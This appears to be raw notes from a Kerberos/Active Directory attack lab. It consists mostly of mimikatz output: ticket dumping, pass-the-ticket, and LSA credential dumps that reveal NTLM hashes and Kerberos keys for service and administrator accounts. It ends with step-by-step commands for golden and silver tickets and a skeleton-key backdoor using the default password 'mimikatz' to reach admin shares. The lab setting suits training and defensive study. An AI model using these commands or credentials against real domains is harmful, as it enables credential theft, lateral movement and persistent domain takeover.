71 15 bc f6 a7 37 41 Group 0 - Ticket Granting Service Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : CONTROLLER-1$ Domain : CONTROLLER Logon Server : (null) Logon Time : 6/24/2024 6:06:48 PM SID : S-1-5-18 * Username : controller-1$ * Domain : CONTROLLER.LOCAL * Password : (null) Group 0 - Ticket Granting Service [00000000] Start/End/MaxRenew: 6/24/2024 6:38:40 PM ; 6/25/2024 4:07:40 AM ; 7/1/2024 6:07:40 PM Service Name (02) : HTTP ; CONTROLLER-1.CONTROLLER.local ; @ CONTROLLER.LOCAL Target Name (02) : HTTP ; CONTROLLER-1.CONTROLLER.local ; @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 2ba817f73043468da009985381a12d86ce1c96eb4d6ba2d97d24e9c788870b1d Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;3e7]-0-0-40a50000-CONTROLLER-1$@HTTP-CONTROLLER-1.CONTROLLER.local.kirbi ! [00000001] Start/End/MaxRenew: 6/24/2024 6:22:11 PM ; 6/25/2024 4:07:40 AM ; 7/1/2024 6:07:40 PM Service Name (02) : GC ; CONTROLLER-1.CONTROLLER.local ; CONTROLLER.local ; @ CONTROLLER.LOCAL Target Name (02) : GC ; CONTROLLER-1.CONTROLLER.local ; CONTROLLER.local ; @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL ( CONTROLLER.local ) Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 1a98c1d99fafd84d4ae973080ab390ddbca0f736b863ff10b89730c41bbd4965 Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;3e7]-0-1-40a50000-CONTROLLER-1$@GC-CONTROLLER-1.CONTROLLER.local.kirbi ! [00000002] Start/End/MaxRenew: 6/24/2024 6:16:52 PM ; 6/25/2024 4:07:40 AM ; 7/1/2024 6:07:40 PM Service Name (02) : cifs ; CONTROLLER-1 ; @ CONTROLLER.LOCAL Target Name (02) : cifs ; CONTROLLER-1 ; @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 4eeca8e5729bc2cd917863de74f319cfbd89bbf5865b523b2dcc801ef27f9b05 Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;3e7]-0-2-40a50000-CONTROLLER-1$@cifs-CONTROLLER-1.kirbi ! [00000003] Start/End/MaxRenew: 6/24/2024 6:08:08 PM ; 6/25/2024 4:07:40 AM ; 7/1/2024 6:07:40 PM Service Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL Target Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac b73a4ace7551cd191fe090ac5b1aaaa8dccbab97a35086d8ee0038b4127a3432 Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;3e7]-0-3-40a50000.kirbi ! [00000004] Start/End/MaxRenew: 6/24/2024 6:08:08 PM ; 6/25/2024 4:07:40 AM ; 7/1/2024 6:07:40 PM Service Name (02) : cifs ; CONTROLLER-1.CONTROLLER.local ; CONTROLLER.local ; @ CONTROLLER.LOCAL Target Name (02) : cifs ; CONTROLLER-1.CONTROLLER.local ; CONTROLLER.local ; @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL ( CONTROLLER.local ) Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 9c9c3518144ead17342a0b8d8318c82cd35f33f2ba83924752983baf9984d398 Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;3e7]-0-4-40a50000-CONTROLLER-1$@cifs-CONTROLLER-1.CONTROLLER.local.kirbi ! [00000005] Start/End/MaxRenew: 6/24/2024 6:07:48 PM ; 6/25/2024 4:07:40 AM ; 7/1/2024 6:07:40 PM Service Name (02) : LDAP ; CONTROLLER-1.CONTROLLER.local ; CONTROLLER.local ; @ CONTROLLER.LOCAL Target Name (02) : LDAP ; CONTROLLER-1.CONTROLLER.local ; CONTROLLER.local ; @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL ( CONTROLLER.LOCAL ) Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac b553572d06114d99d160629e28c377b007e1d8a5ab8b7cdb05aae60361eeacfe Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;3e7]-0-5-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.CONTROLLER.local.kirbi ! [00000006] Start/End/MaxRenew: 6/24/2024 6:07:40 PM ; 6/25/2024 4:07:40 AM ; 7/1/2024 6:07:40 PM Service Name (02) : ldap ; CONTROLLER-1.CONTROLLER.local ; @ CONTROLLER.LOCAL Target Name (02) : ldap ; CONTROLLER-1.CONTROLLER.local ; @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 5648e0750373f1ea354b5b8d774adab4491813e74dd8ede4777dd4868860867c Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;3e7]-0-6-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi ! [00000007] Start/End/MaxRenew: 6/24/2024 6:07:40 PM ; 6/25/2024 4:07:40 AM ; 7/1/2024 6:07:40 PM Service Name (02) : LDAP ; CONTROLLER-1 ; @ CONTROLLER.LOCAL Target Name (02) : LDAP ; CONTROLLER-1 ; @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 2fcb68c3b79734f48ec70cd6c55b39ff3ff76548c0aa3bf45b35a3ab9ecd348e Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;3e7]-0-7-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.kirbi ! Group 1 - Client Ticket ? [00000000] Start/End/MaxRenew: 6/24/2024 6:35:43 PM ; 6/24/2024 6:50:43 PM ; 7/1/2024 6:07:40 PM Service Name (01) : controller-1$ ; @ (null) Target Name (10) : administrator@CONTROLLER.local ; @ (null) Client Name (10) : administrator@CONTROLLER.local ; @ CONTROLLER.LOCAL Flags 00a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; Session Key : 0x00000012 - aes256_hmac e5a90d49db509f11d6cdcc9b50c5b2bb5f12f90604b0d3991fc3c62a836c92a2 Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;3e7]-1-0-00a50000.kirbi ! Group 2 - Ticket Granting Ticket [00000000] Start/End/MaxRenew: 6/24/2024 6:07:40 PM ; 6/25/2024 4:07:40 AM ; 7/1/2024 6:07:40 PM Service Name (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL Target Name (--) : @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL ( $$Delegation Ticket$$ ) Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ; Session Key : 0x00000012 - aes256_hmac d108b2938441d1235d46c6c2afedad02e7ade986a010aba29af4bb56c357a45d Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...] * Saved to file [0;3e7]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi ! [00000001] Start/End/MaxRenew: 6/24/2024 6:07:40 PM ; 6/25/2024 4:07:40 AM ; 7/1/2024 6:07:40 PM Service Name (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL Target Name (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL ( CONTROLLER.LOCAL ) Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac da0b6a790d9a28180747bbf12fce18451cb2530358d71f0ca72f41696f5bcf50 Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...] * Saved to file [0;3e7]-2-1-40e10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi ! mimikatz # kerberos::ptt [0;1fc304]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi * File: '[0;1fc304]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi': OK controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>klist Current LogonId is 0:0x1fc304 Cached Tickets: (3) #0> Client: Administrator @ CONTROLLER.LOCAL Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 6/24/2024 18:35:46 (local) End Time: 6/25/2024 4:35:46 (local) Renew Time: 7/1/2024 18:35:46 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0x1 -> PRIMARY Kdc Called: #1> Client: Administrator @ CONTROLLER.LOCAL Server: CONTROLLER-1/HTTPService.CONTROLLER.local:30222 @ CONTROLLER.LOCAL KerbTicket Encryption Type: RSADSI RC4-HMAC(NT) Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize Start Time: 6/24/2024 18:52:43 (local) End Time: 6/25/2024 4:35:46 (local) Renew Time: 7/1/2024 18:35:46 (local) Session Key Type: RSADSI RC4-HMAC(NT) Cache Flags: 0 Kdc Called: CONTROLLER-1 #2> Client: Administrator @ CONTROLLER.LOCAL Server: CONTROLLER-1/SQLService.CONTROLLER.local:30111 @ CONTROLLER.LOCAL KerbTicket Encryption Type: RSADSI RC4-HMAC(NT) Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize Start Time: 6/24/2024 18:52:43 (local) End Time: 6/25/2024 4:35:46 (local) Renew Time: 7/1/2024 18:35:46 (local) Session Key Type: RSADSI RC4-HMAC(NT) Cache Flags: 0 Kdc Called: CONTROLLER-1
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # lsadump::lsa /inject /name:sqlservice Domain : CONTROLLER / S-1-5-21-432953485-3795405108-1502158860 RID : 00000455 (1109) User : sqlservice * Primary NTLM : cd40c9ed96265531b21fc5b1dafcfb0a LM : Hash NTLM: cd40c9ed96265531b21fc5b1dafcfb0a ntlm- 0: cd40c9ed96265531b21fc5b1dafcfb0a lm - 0: 7bb53f77cde2f49c17190f7a071bd3a0 * WDigest 01 ba42b3f2ef362e231faca14b6dea61ef 02 00a0374f4ac4bce4adda196e458dd8b8 03 f39d8d3e34a4e2eac8f6d4b62fe52d06 04 ba42b3f2ef362e231faca14b6dea61ef 05 98c65218e4b7b8166943191cd8c35c23 06 6eccb56cda1444e3909322305ed04b37 07 25b7998ce2e7b826a576a43f89702921 08 8609a1da5628a4016d32f9eb73314fa0 09 277f84c6c59728fb963a6ee1a3b27f0d 10 63a9f69e8b36c3e0612ec8784b9c7599 11 47cb5c436807396994f1b9ccc8d2f8e1 12 46f2c402d8731ed6dca07f5dbc71a604 13 2990e284070a014e54c749a6f96f9be7 14 c059f85b7f01744dc0a2a013978a965f 15 3600c835f3e81858a77e74370e047e29 16 bd9c013f8a3f743f8a5b553e8a275a88 17 c1d94e24d26fdaad4d6db039058c292e 18 1a433c0634b50c567bac222be4eac871 19 78d7a7573e4af2b8649b0280cd75636d 20 136ddfa7840610480a76777f3be007e0 21 7a4a266a64910bb3e5651994ba6d7fb4 22 a75ec46a7a473e90da499c599bc3d3cb 23 8d3db50354c0744094334562adf74c2a 24 7d07406132d671f73a139ff89da5d72e 25 dd1e02d5c5b8ae969d903a0bc63d9191 26 27da7fc766901eac79eba1a970ceb7da 27 09333600bcc68ee149f449321a5efb27 28 1c550f8b3af2eb4efda5c34aa8a1c549 29 3cd9326a300d2261451d1504832cb062 * Kerberos Default Salt : CONTROLLER.LOCALSQLService Credentials des_cbc_md5 : 5d5dae0dc10e7aec * Kerberos-Newer-Keys Default Salt : CONTROLLER.LOCALSQLService Default Iterations : 4096 Credentials aes256_hmac (4096) : a3a6dbd4d6fa895b600c28bfdaf6b52d59d46a6eb1f455bc08a19b7e8cdab76d aes128_hmac (4096) : 629b46af543142f77cabcf14afb1caea des_cbc_md5 (4096) : 5d5dae0dc10e7aec * NTLM-Strong-NTOWF Random Value : 7e9547ab69f52e42450903ebbe6ad6ec mimikatz # lsadump::lsa /inject /name:administrator Domain : CONTROLLER / S-1-5-21-432953485-3795405108-1502158860 RID : 000001f4 (500) User : administrator * Primary NTLM : 2777b7fec870e04dda00cd7260f7bee6 LM : Hash NTLM: 2777b7fec870e04dda00cd7260f7bee6 * Kerberos Default Salt : WIN-G83IJFV2N03Administrator Credentials des_cbc_md5 : 918abaf7dcb02ce6 * Kerberos-Newer-Keys Default Salt : WIN-G83IJFV2N03Administrator Default Iterations : 4096 Credentials aes256_hmac (4096) : 42b3c13c8c0fef3175eb2b5926f805f919123efd001a9c5a16ee9a86101e32b4 aes128_hmac (4096) : d01d6ccf97a2ee214ec7185173a3b659 des_cbc_md5 (4096) : 918abaf7dcb02ce6 * NTLM-Strong-NTOWF Random Value : 7bfd4ae86442827fb0db294d5c9855ce
Dump the krbtgt hash - lsadump::lsa /inject /name:krbtgt - This will dump the hash as well as the security identifier needed to create a Golden Ticket.
Create a Golden/Silver Ticket - Kerberos::golden /user:Administrator /domain:controller.local /sid: /krbtgt: /id: - This is the command for creating a golden ticket to create a silver ticket simply put a service NTLM hash into the krbtgt slot, the sid of the service account into sid, and change the id to 1103.
Use the Golden/Silver Ticket to access other machines - misc::cmd this will open a new elevated command prompt with the given ticket in mimikatz
cd40c9ed96265531b21fc5b1dafcfb0a
2777b7fec870e04dda00cd7260f7bee6
The default hash for a mimikatz skeleton key is 60BA4FCADC466C7A033C178194C03DF6 which makes the password -"mimikatz"
Installing the Skeleton Key w/ mimikatz -
misc::skeleton
Yes! that's it but don't underestimate this small command it is very powerfulAccessing the forest -
The default credentials will be: "mimikatz"
mimikatz # misc::skeleton [KDC] data [KDC] struct [KDC] keys patch OK [RC4] functions [RC4] init patch OK [RC4] decrypt patch OK
example:
net use c:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
- The share will now be accessible without the need for the Administrators password
dir \\Desktop-1\c$ /user:Machine1 mimikatz
- access the directory of Desktop-1 without ever knowing what users have access to Desktop-1
The skeleton key will not persist by itself because it runs in the memory, it can be scripted or persisted using other tools and techniques however that is out of scope for this room.